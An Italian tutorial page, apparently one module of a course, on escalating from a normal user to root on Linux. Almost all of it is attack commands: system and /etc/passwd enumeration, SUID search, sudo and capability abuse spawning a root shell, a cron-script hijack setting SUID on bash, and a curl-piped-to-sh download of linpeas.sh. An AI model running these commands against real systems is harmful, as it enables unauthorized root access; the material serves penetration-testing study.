Da User a Root
Hai accesso come utente normale. Ora devi diventare root.
Enumerazione Prima di Tutto
uname -a && id && whoami
cat /etc/passwd
cat /etc/crontab
SUID Binaries
find / -perm -4000 2>/dev/null
# Controlla su gtfobins.github.io
Sudo Misconfiguration
sudo -l
# (ALL) NOPASSWD: /usr/bin/python3
sudo python3 -c "import os; os.system('/bin/bash')"
Cron Jobs
cat /etc/crontab
# Se script root e scrivibile:
echo "chmod +s /bin/bash" >> /path/script.sh
bash -p
Capabilities
getcap -r / 2>/dev/null
python3 -c "import os; os.setuid(0); os.system('/bin/bash')"
LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
GTFOBins: gtfobins.github.io - catalogo binari Unix sfruttabili.
Conclusione
Nel Modulo 10: privilege escalation Windows.
Nessun commento ancora. Sii il primo!